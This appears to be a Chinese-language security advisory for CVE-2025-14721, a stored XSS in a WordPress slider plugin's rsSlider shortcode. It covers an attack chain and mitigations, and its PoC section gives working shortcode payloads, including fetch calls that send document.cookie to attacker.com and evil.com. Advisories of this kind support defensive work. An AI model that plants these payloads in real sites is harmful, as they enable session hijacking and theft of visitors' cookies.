CVE-2025-14721 WordPress Responsive and Swipe Slider存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14721

漏洞类型

存储型XSS (Stored Cross-Site Scripting)

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Responsive and Swipe slider plugin for WordPress

漏洞概述

CVE-2025-14721是WordPress平台上一款名为"Responsive and Swipe slider"的插件存在的安全漏洞。该插件主要用于在WordPress网站上创建响应式滑动轮播图。在1.0.2及之前的所有版本中，由于插件的rsSlider短代码对用户提供的属性参数缺乏充分的输入过滤和输出转义处理，导致存在存储型跨站脚本攻击（Stored XSS）漏洞。攻击者利用该漏洞需要具备WordPress网站 contributor 级别或更高权限。成功利用后，攻击者可以在页面中注入任意JavaScript脚本代码。当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。由于漏洞性质为存储型，恶意代码会持久保存在服务器数据库中，影响范围持续存在。CVSS评分5.5，属于中等严重程度，主要风险在于需要高权限用户配合，但攻击成功后影响较为严重。

技术细节

该漏洞存在于Responsive and Swipe Slider插件的shortcode.php文件第100行附近。问题根源在于rsSlider短代码处理用户输入属性时，未对属性值进行适当的HTML实体转义。攻击者可以通过构造恶意属性值（如包含<script>标签或事件处理器如onerror、onload等），在短代码解析时将恶意内容直接输出到页面HTML中。由于这些内容被存储在WordPress数据库中（post_content表），每次页面被访问时都会从数据库读取并执行，形成存储型XSS攻击。攻击者利用条件：1）拥有WordPress contributor角色或更高权限；2）能够创建或编辑文章/页面；3）在文章中使用rsSlider短代码并注入恶意属性。防御措施：1）使用esc_html()或esc_attr()对所有用户输入进行转义；2）实施wp_kses()对HTML标签白名单过滤；3）升级到1.0.3或更高版本。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站 contributor 或更高权限账户

STEP 2

步骤2

攻击者创建或编辑文章/页面，插入包含恶意JavaScript代码的rsSlider短代码

STEP 3

步骤3

恶意内容通过短代码处理流程被存储到WordPress数据库（post_content字段）

STEP 4

步骤4

其他用户访问包含恶意短代码的页面，服务器从数据库读取内容并通过shortcode.php解析输出

STEP 5

步骤5

由于缺乏输出转义，恶意JavaScript代码被直接嵌入到页面HTML中

STEP 6

步骤6

受害者浏览器执行注入的JavaScript代码，导致会话劫持、敏感信息泄露或恶意重定向

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress rsSlider Shortcode Stored XSS PoC -->
<!-- Attacker with contributor+ role can inject malicious JavaScript -->

<!-- Basic XSS via shortcode attribute -->
[rsSlider id='"><script>alert(document.cookie)</script>']

<!-- Event handler based XSS (no script tags needed) -->
[rsSlider id='" onerror="alert(String.fromCharCode(88,83,83))" data-x='"]
[rsSlider name='<img src=x onerror=alert(document.domain)>']

<!-- Steal session cookies -->
[rsSlider id='"><script>fetch("https://attacker.com/steal?c="+encodeURIComponent(document.cookie))</script>']

<!-- Auto-execution without user interaction -->
[rsSlider id='1" style="animation-name:exploit" onanimationstart="fetch(\'https://evil.com/log?data=\'+btoa(document.cookie))"']

影响范围

Responsive and Swipe slider for WordPress <= 1.0.2

防御指南

临时缓解措施

立即将Responsive and Swipe Slider插件升级到最新版本（1.0.3+）。如果暂时无法升级，可临时禁用该插件，或在WordPress主题的functions.php中添加过滤器移除rsSlider短代码的恶意属性。保持WordPress核心、主题和所有插件的更新，定期使用WordFence、Sucuri等安全插件进行漏洞扫描。